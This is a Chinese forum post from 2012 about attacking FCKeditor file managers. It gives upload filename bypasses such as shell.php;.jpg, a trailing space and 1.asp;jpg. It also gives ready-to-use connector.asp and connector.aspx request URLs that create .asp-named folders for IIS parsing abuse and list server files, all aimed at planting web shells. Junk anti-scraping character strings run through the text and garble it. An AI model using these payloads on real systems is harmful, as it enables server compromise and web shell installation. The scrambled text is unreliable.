很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg6 y3 D# W% K! d h/ u4 N% H
3 X: `- U5 ]- w* N提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。6 v* ?/ f" d7 C& u8 u, {+ o3 W
& ] ^5 h" W4 W& ]5 V+ F/ w; V" m+ P
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。& H1 B/ R# S8 J ]
) Q' v& ?% G( l) Z& }7 M8 T
突破建立文件夹:
B! X; l! y# n9 E {2 m$ Y+ n" o% t, e# Z$ @8 U
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp; V/ R5 P% r" \
; z3 ?6 M" g8 W3 g4 L
参数:& V9 | `" C8 q; R5 _. @+ B4 ~* G
) _+ | r7 u# O$ p当前目录名:CurrentFolder=/qing.asp4 B* o: e' w m& M
" o; C) U8 Q# @" k
新的目录名:NewFolderName=x.asp: Y/ B/ g3 x( W4 J+ R d- p
9 ]/ T9 s) B. q7 i+ _其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
, B6 P$ k% H' c( j; |7 l4 x- ?
9 y4 C2 T7 p( U, x那么 x.asp 就已经建立生成了,此方法百试百灵!
: C2 L" u6 _2 `4 J# g: r. S. }
2 |$ h+ j" I' A% X: p" H3 K新建文件夹参数 x.asp,基本都能搞定。4 u. K- O3 V: m# M
# z" U" Y8 @ X2 w5 p* Z/ r下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
. S* w0 d n: x. d1 ~- y3 C% T2 X* ~% ~8 C2 X+ m
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp. a! g3 k, ?! t3 J: D. _
2 R8 S7 a/ L8 A获取文件列表* u- Q. a+ R2 T
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F: C9 c% H( L# W' C# G9 s( _( u
- X) b) }2 [- Z6 ^! U/ d0 A |
发表于 2012-12-31 09:27:09
收藏
支持
反对